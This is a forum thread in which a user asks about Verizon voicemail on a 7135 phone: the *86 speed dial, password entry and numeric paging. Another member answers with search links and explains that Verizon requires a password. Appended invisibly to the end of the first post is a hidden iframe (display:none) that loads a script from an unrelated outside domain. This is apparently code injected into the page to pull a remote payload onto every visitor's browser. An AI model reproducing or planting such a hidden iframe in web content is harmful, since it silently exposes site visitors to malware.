+ Reply to Thread

Verizon Voice Mail Problem

I have a 7135.

Problem 1

Speed Dial 1 is fixed to *86 to dial into my Voice Mail box.

Problem. It only allows me to record a message.

I believe that it should immediatly take me to the mail box so I can immedialty listen to my messages.

It was also my understanding that when my mailbox is dialed from my handset, I would not have to enter a password. I should only enter a password when accessing the voice mail system from another phone.

That is how it works with Sprint and with Cingular.

How is it supposted to work from a Verizon 7135?

Do I need to always interrupt the message and dial a # followed by the password?

Is there any way to reprogram the speed dial 1 to dial *86 a pause and then the pasword?

Problem 2

How do you get the Office Message Alert turned on so when someone calls me they get an option to leave a voice message or a numeric message (page)?

I expect Verizon Voice Mail to work like Cingular or Sprint.

Thanks<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Verizon Voice Mail Problem

Originally posted by smartphone fan
    I have a 7135.

Problem 1

Speed Dial 1 is fixed to *86 to dial into my Voice Mail box.

Problem. It only allows me to record a message.

I believe that it should immediatly take me to the mail box so I can immedialty listen to my messages.

It was also my understanding that when my mailbox is dialed from my handset, I would not have to enter a password. I should only enter a password when accessing the voice mail system from another phone.

That is how it works with Sprint and with Cingular.

How is it supposted to work from a Verizon 7135?

Do I need to always interrupt the message and dial a # followed by the password?

Is there any way to reprogram the speed dial 1 to dial *86 a pause and then the pasword?

Problem 2

How do you get the Office Message Alert turned on so when someone calls me they get an option to leave a voice message or a numeric message (page)?

I expect Verizon Voice Mail to work like Cingular or Sprint.

Thanks
    To change speed dial 1, might I suggest searching the forum:

http://www.smartphonesource.com/vbulletin/search.php?s=

Or here is the thread with the answer:

http://www.smartphonesource.com/vbul...ail+speed+dial

Verizon requires you to enter your password. In some markets, they currently require you to hit # first, but they are upgrading the voice mail systems throughout the country, and will not require it soon. When you voice mail is upgraded to not require the #, you will also have the option for callers to hit 5 and send a numeric page.

Alan